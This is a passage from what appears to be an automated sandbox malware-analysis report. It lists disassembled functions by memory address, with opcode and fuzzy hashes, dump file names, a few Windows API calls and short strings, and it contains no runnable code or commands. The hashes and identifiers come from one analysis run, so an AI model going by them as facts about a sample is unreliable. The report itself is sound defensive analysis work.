                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                              • API String ID: 1091760877-2248577382
                                                                                              • Opcode ID: 2c1f9a3f77b05184c18599f673a7aae47e5fa91f7e8814a253b7eb958e695e25
                                                                                              • Instruction ID: 15a05cbd8ba015445af6db31daacb1b1475f4a89c1e64afc8e9afd336a4ce199
                                                                                              • Opcode Fuzzy Hash: 2c1f9a3f77b05184c18599f673a7aae47e5fa91f7e8814a253b7eb958e695e25
                                                                                              • Instruction Fuzzy Hash: CAD05E32A0803077CA212724BC0AEFF79199F56730F204715F239665F6DB260AA296E9
                                                                                              Function 000FDA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,000FD32F,?), ref: 000FDA53
                                                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005,?,000FD32F,?), ref: 000FDA61
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: FindHandleModuleResource
                                                                                              • String ID: RTL
                                                                                              • API String ID: 3537982541-834975271
                                                                                              • Opcode ID: af08bcf2f06cf9e5d9d5321b6ed38f13f90810696447869ee4cbc9eeb4b1e9ad
                                                                                              • Instruction ID: b5b9ca0b22a4a64e278b91b4801ace8ed5e95951fb79ab5a3e2deb02fdff367e
                                                                                              • Opcode Fuzzy Hash: af08bcf2f06cf9e5d9d5321b6ed38f13f90810696447869ee4cbc9eeb4b1e9ad
                                                                                              • Instruction Fuzzy Hash: FEC01232389360B6EB3027307C0DB932A886B11B12F09054DB251DA9D0DAE9CA9286A4

                                                                                              Executed Functions

                                                                                              Function 00007FFD9BAB35C5 Relevance: 1.5, Strings: 1, Instructions: 291COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M_H
                                                                                              • API String ID: 0-372873180
                                                                                              • Opcode ID: 76b8322fd4cac7eb66384f00220c103ae62d1c6b02dd3db53633e176c72e9888
                                                                                              • Instruction ID: 84251f9ce75b812da79694551dc920ed7f3e97586908a8cdadc1ec92bab8ccfd
                                                                                              • Opcode Fuzzy Hash: 76b8322fd4cac7eb66384f00220c103ae62d1c6b02dd3db53633e176c72e9888
                                                                                              • Instruction Fuzzy Hash: 93A1AD71A1995E8FEB98DB68C8657AD7BE1FF59314F4002BED01DC72DACBB528018B40
                                                                                              Function 00007FFD9BAB16E8 Relevance: .3, Instructions: 281COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dec1332857645d2c52fb688aff90acb056ed7a3f96ec4d8d3fc1827190034e7c
                                                                                              • Instruction ID: 7147528be38673838ce32d6a83ae6cba38458733217ff24567c1281fcadaa1c4
                                                                                              • Opcode Fuzzy Hash: dec1332857645d2c52fb688aff90acb056ed7a3f96ec4d8d3fc1827190034e7c
                                                                                              • Instruction Fuzzy Hash: 2181E031B2DA594FDB58DF5888615B977E2EFE8300F15417AE46DC32A2DE34AD02CB80
                                                                                              Function 00007FFD9BAC4A80 Relevance: .2, Instructions: 190COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d3bceebcec775b9bdce848883677b462bae84902598047eda2e1e2249da6ad58
                                                                                              • Instruction ID: c50f1439af47b0feda3a20807ecfbd3333a91408794f7761e70e3922255c2473
                                                                                              • Opcode Fuzzy Hash: d3bceebcec775b9bdce848883677b462bae84902598047eda2e1e2249da6ad58
                                                                                              • Instruction Fuzzy Hash: 44511A70E1991D8FEFA4EBA8C855ABDB7F1FF58301F40016AD01DE32A6DE7569818B40
                                                                                              Function 00007FFD9BAB1D2D Relevance: .2, Instructions: 185COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 37bade72d828b40c09d2ed5b5e28773b37ac3519093ecc989496379e9100fd93
                                                                                              • Instruction ID: fc43ccb493f805fb7819916208f5fe1fdaf86a408e1eb2868d54752bf8efc96b
                                                                                              • Opcode Fuzzy Hash: 37bade72d828b40c09d2ed5b5e28773b37ac3519093ecc989496379e9100fd93
                                                                                              • Instruction Fuzzy Hash: 1651D331B18B594FDB58DF5888645BA77E2FFE8300F15417EE46AC7296DE34E8028B81
                                                                                              Function 00007FFD9BAB3211 Relevance: .2, Instructions: 152COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fe48a14b5ae0d11a1e8ea6cbe212045537f6b0b33a53c0c787eab0c94bd99d1c
                                                                                              • Instruction ID: 4119b616cbe1b95e15dc1afd5ce2c32d3d75be4861280be875470ccea1566327
                                                                                              • Opcode Fuzzy Hash: fe48a14b5ae0d11a1e8ea6cbe212045537f6b0b33a53c0c787eab0c94bd99d1c
                                                                                              • Instruction Fuzzy Hash: 55514B71E0A62D8FEB64EF94D4646EDBBF1EF58300F41407AD019E72A1DA78AA44CF00
                                                                                              Function 00007FFD9BAB2145 Relevance: .1, Instructions: 140COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 88374edb867471b043e21bd4121405cc80646d03ece30d727454c285ac796718
                                                                                              • Instruction ID: ff585c1a152b9b8dca1bbedd772eae8f88bd5b5ad18a3b542200bd9683bd719d
                                                                                              • Opcode Fuzzy Hash: 88374edb867471b043e21bd4121405cc80646d03ece30d727454c285ac796718
                                                                                              • Instruction Fuzzy Hash: A0415B31B1E65A0FD365D7B8A4655B87BD0EF86310F0605F7E46CC71E2DE68A9018B41
                                                                                              Function 00007FFD9BAB334B Relevance: .1, Instructions: 79COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c5b8c50b095e0a036215b66c089b99c7879d543a28d4525c4d6e75db9901fa3a
                                                                                              • Instruction ID: d034cf59ee7613d8dbe254c80ae358c640d6689f8f3c370ed5a264acd2e488cf
                                                                                              • Opcode Fuzzy Hash: c5b8c50b095e0a036215b66c089b99c7879d543a28d4525c4d6e75db9901fa3a
                                                                                              • Instruction Fuzzy Hash: 8421D571E0962D8FEB64EB98C4A4AEDBBF1FF58301F51416AD019E72A5CA786940CF10
                                                                                              Function 00007FFD9BAB3427 Relevance: .1, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5fbe0d2446e6e888f0393e4629269f4a7461c8b8a55df886d0863fcbd2cbccb9
                                                                                              • Instruction ID: fea973d700835e23c2262a65e43df65f68cb1ceec412d4ac306870965db879d5
                                                                                              • Opcode Fuzzy Hash: 5fbe0d2446e6e888f0393e4629269f4a7461c8b8a55df886d0863fcbd2cbccb9
                                                                                              • Instruction Fuzzy Hash: 01210430A4E29D4FD717ABB088685A93FF4EF47311F0945FBD458C70B2DA689545CB11
                                                                                              Function 00007FFD9BAB0A01 Relevance: .1, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b152f67eeb2f43146f26db5d0352f484eb1a67595b9263deb8a83f37f65500b3
                                                                                              • Instruction ID: a14fcb1602cbbc00ffa5af608e263126b524556bea24e4b6e6b0a4f053812332
                                                                                              • Opcode Fuzzy Hash: b152f67eeb2f43146f26db5d0352f484eb1a67595b9263deb8a83f37f65500b3
                                                                                              • Instruction Fuzzy Hash: C011B271E1955E4FE7A0EBA888695BD7BE0FF58700F4149BAD028C70A6EE74A5408B40
                                                                                              Function 00007FFD9BAB0F66 Relevance: .1, Instructions: 65COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 444f22e5b694db9e41225725908522e90ff3b639efe1f85d180abc7666cbc086
                                                                                              • Instruction ID: 068235813284450a7bb3a5c83dea556423c2643567ee1047137bcd1ae0b56a0c
                                                                                              • Opcode Fuzzy Hash: 444f22e5b694db9e41225725908522e90ff3b639efe1f85d180abc7666cbc086
                                                                                              • Instruction Fuzzy Hash: B0219F30E1592D8BEBA8EB54C861FA8B2A1FF54300F5182B9D01DE71A5DE346A458F80
                                                                                              Function 00007FFD9BAB88F3 Relevance: .1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aea38f35252328306395ee29aeb9dff93f278af32f22aec936c1d2ecbafdf1ab
                                                                                              • Instruction ID: 541ca8cb37e5c8596ba1f732d768c11c46700d92b083b2c6d8e4aa452f9914ad
                                                                                              • Opcode Fuzzy Hash: aea38f35252328306395ee29aeb9dff93f278af32f22aec936c1d2ecbafdf1ab
                                                                                              • Instruction Fuzzy Hash: 92216470E1966D8FDFB9DB58D850BACB7B8FB58701F1145E9A01EE3250DA706B809F00
                                                                                              Function 00007FFD9BAB125D Relevance: .1, Instructions: 61COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 27052bcf931fb933bb4c458f1cd2268ba2e15c7979e24df36d78d63e51d0b95f
                                                                                              • Instruction ID: 9df02169f26b5f50cad66f7c3f4d82d5369a86e5485d059523c3aa267be6f502
                                                                                              • Opcode Fuzzy Hash: 27052bcf931fb933bb4c458f1cd2268ba2e15c7979e24df36d78d63e51d0b95f
                                                                                              • Instruction Fuzzy Hash: 0B11C830A1A69E4FEB699BA8C4B96F97BE0FF25300F41047ED429C61E2DEB56540CB00
                                                                                              Function 00007FFD9BAB3545 Relevance: .1, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4e582907591fae619abbd74b8acc8ccac752bf2f82907cd6da1ad555ac503aff
                                                                                              • Instruction ID: 20968e503f558cd728f0cdacbd32bbdf1d17dde01fa44172ff2019dfc71e0fab
                                                                                              • Opcode Fuzzy Hash: 4e582907591fae619abbd74b8acc8ccac752bf2f82907cd6da1ad555ac503aff
                                                                                              • Instruction Fuzzy Hash: AE115270A1965E8FDB59EFA4C8696BD7BE0FF18300F0105BFD429C61A1DB75A540CB00
                                                                                              Function 00007FFD9BAB05D8 Relevance: .0, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bc63d6d2a51b57d275fbe5d23fbc9d0ae13e26902cf6ab38f8344b8b1688d4e7
                                                                                              • Instruction ID: fda23207721f97c6b7f14ce8b2f8b774519c7fc14d3a019ce7043b2f1fb355fe
                                                                                              • Opcode Fuzzy Hash: bc63d6d2a51b57d275fbe5d23fbc9d0ae13e26902cf6ab38f8344b8b1688d4e7
                                                                                              • Instruction Fuzzy Hash: 8501F530A1950E8FDB98EFA4C4686B977E1FF69305F10447ED41EC21A4CE71A650CF40
                                                                                              Function 00007FFD9BAB88AA Relevance: .0, Instructions: 48COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 94c1ea6dd44d1d8604a8552fd41d9c5be6068453f58e5f782484edd6a6014f5f
                                                                                              • Instruction ID: ad5729d874da888a2f0b68dce718e8c688958726786bdb707a31f27a9b441bc6
                                                                                              • Opcode Fuzzy Hash: 94c1ea6dd44d1d8604a8552fd41d9c5be6068453f58e5f782484edd6a6014f5f
                                                                                              • Instruction Fuzzy Hash: 0711A770A0862D8FDFA9DB58D890BACB7B4FB18300F1045E9E41EE3250DB706B808F40
                                                                                              Function 00007FFD9BAB287D Relevance: .0, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4fdcb1486341ead3b38aadb6edf3fc9518e2911dde7b2d8617e38db05f2978eb
                                                                                              • Instruction ID: 967c1e90cec6fe35338d8949f4250934fe62e2f114813a02aafbddae8cb1a99e
                                                                                              • Opcode Fuzzy Hash: 4fdcb1486341ead3b38aadb6edf3fc9518e2911dde7b2d8617e38db05f2978eb
                                                                                              • Instruction Fuzzy Hash: 0101A230A1A65E8FE761ABE498585B97BF0FF59301F0245B7D41CC70B6EB38E6948B01
                                                                                              Function 00007FFD9BAB2F19 Relevance: .0, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 47bdf01e2dda2119310d3585b4624fdcc78229157cd811843d68004cc45bbf5b
                                                                                              • Instruction ID: 4f25b387546a5755604bbd63cd4fcbe63a192b9823956c00663fceab5af8f512
                                                                                              • Opcode Fuzzy Hash: 47bdf01e2dda2119310d3585b4624fdcc78229157cd811843d68004cc45bbf5b
                                                                                              • Instruction Fuzzy Hash: 96017571A0E74D4FE752ABB488695A97FE0EF15300F0645F7D428C70B7DA64A658CB01
                                                                                              Function 00007FFD9BAB0610 Relevance: .0, Instructions: 42COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 644b91f69f036e127256011ebbcd153e45a3d1366b55e03eccf35e36ef1bf8c3
                                                                                              • Instruction ID: 9dca7bc1ddf866dfabaeaceb580f9e539a345ec520396a68d1823ac89c365da6
                                                                                              • Opcode Fuzzy Hash: 644b91f69f036e127256011ebbcd153e45a3d1366b55e03eccf35e36ef1bf8c3
                                                                                              • Instruction Fuzzy Hash: EC014F30A1960E8AEB59AFA494695B976A0FF18305F11447ED42EC21E5DE75A650CA00
                                                                                              Function 00007FFD9BAB0608 Relevance: .0, Instructions: 42COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 62ad35d610e722f265e62cee33fab714e3c847c8ab2d1a55363375d78dc5a607
                                                                                              • Instruction ID: 89d3d6512b54c44c61d2d7b0f1cec46483191caf7465d35b7d637e92aaf28f7e
                                                                                              • Opcode Fuzzy Hash: 62ad35d610e722f265e62cee33fab714e3c847c8ab2d1a55363375d78dc5a607
                                                                                              • Instruction Fuzzy Hash: E3018130A1960E8BEB58EBA4D4686B97BA0FF18305F11087FD42EC21E5DE75A290CE00
                                                                                              Function 00007FFD9BAB1CAD Relevance: .0, Instructions: 42COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2ed52e02818d5cd8c39e8ec7e810561d2a69b0ca14bba038e226e2d5db96ecd3
                                                                                              • Instruction ID: 071ac0aa5135f8a519a349711ef766edde4e34a658d3332ad92f980b8ebb7f35
                                                                                              • Opcode Fuzzy Hash: 2ed52e02818d5cd8c39e8ec7e810561d2a69b0ca14bba038e226e2d5db96ecd3
                                                                                              • Instruction Fuzzy Hash: 5701F931A1A64E8FDB94DF54C8656F97BA0FF65300F51017EE81CC21A1DBB5E550CB40
                                                                                              Function 00007FFD9BAB1270 Relevance: .0, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: edaf04ac843597551be705feb99fa10b69ae83405c60625421878b633c4458f4
                                                                                              • Instruction ID: a4d32e73d01f653deab3863a161faa5f7250c00fce0729475efee14cdac16580
                                                                                              • Opcode Fuzzy Hash: edaf04ac843597551be705feb99fa10b69ae83405c60625421878b633c4458f4
                                                                                              • Instruction Fuzzy Hash: 33F0A930B1A69F49FF649BA888696FA77E4FF66314F01043ED46DC10E1DEB41614CA00
                                                                                              Function 00007FFD9BAB05D0 Relevance: .0, Instructions: 39COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8eeb14af6980b112c3f3b1ba764b556a4541ec00f6b47acc5e9f49318b515d7b
                                                                                              • Instruction ID: 6c0036ef526ecacfc0f07885cf67978dbcf19390bd59f81d313c8cce4e76de5d
                                                                                              • Opcode Fuzzy Hash: 8eeb14af6980b112c3f3b1ba764b556a4541ec00f6b47acc5e9f49318b515d7b
                                                                                              • Instruction Fuzzy Hash: 6AF0FC31A2E55E8FEB54EFA4C4255F97790FF25309F11447AE81DC21D1CA75A550CF40
                                                                                              Function 00007FFD9BAB2799 Relevance: .0, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 54c17a788311945ca99f3683ecdcd4fdc82cc315cede11d30a9d4a1f2d733f44
                                                                                              • Instruction ID: c884887e6ace50b8932ff8f0ebc9edf040f0db951f3159d6f6be64c91894cf6c
                                                                                              • Opcode Fuzzy Hash: 54c17a788311945ca99f3683ecdcd4fdc82cc315cede11d30a9d4a1f2d733f44
                                                                                              • Instruction Fuzzy Hash: 9EF0963191E78E8FDB599FA494645A93B70BF05305F4204BBD419C60E2DB386594CB51
                                                                                              Function 00007FFD9BAB280D Relevance: .0, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1819501009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bab0000_System.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4a79ecefb716a9605666d6af681958ebd18a5fb4c93fc5598bd6bcea4591d48f
                                                                                              • Instruction ID: 3d145074c3c05744836179801fed343d23ec1113bd171b3159c69d8ced3b733b
                                                                                              • Opcode Fuzzy Hash: 4a79ecefb716a9605666d6af681958ebd18a5fb4c93fc5598bd6bcea4591d48f
                                                                                              • Instruction Fuzzy Hash: 0EF0F63091E78D8FE7699FA088252A93FA0FF55300F4100BBD428C50E1DB799554CB00

                                                                                              Executed Functions

                                                                                              Function 00007FFD9BA93427 Relevance: 1.7, Strings: 1, Instructions: 468COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: O_H
                                                                                              • API String ID: 0-364725170
                                                                                              • Opcode ID: 050d9ff7c1b3dc63c90c13343b8e8f91b8dcf5341c17573b53cf8f435f4a3849
                                                                                              • Instruction ID: 88ad4d4f41242ed5c6c87ab589d0a8e7be8fea125ffb328b9d5f971f017fdc2e
                                                                                              • Opcode Fuzzy Hash: 050d9ff7c1b3dc63c90c13343b8e8f91b8dcf5341c17573b53cf8f435f4a3849
                                                                                              • Instruction Fuzzy Hash: EAF10071A09A4E8FEB59DB68C8657E97BF0FF49314F4101BAD009C72E6DBB86901CB40
                                                                                              Function 00007FFD9BAA5150 Relevance: 1.5, Instructions: 1506COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001E.00000002.4215658847.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_30_2_7ffd9ba90000_Idle.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
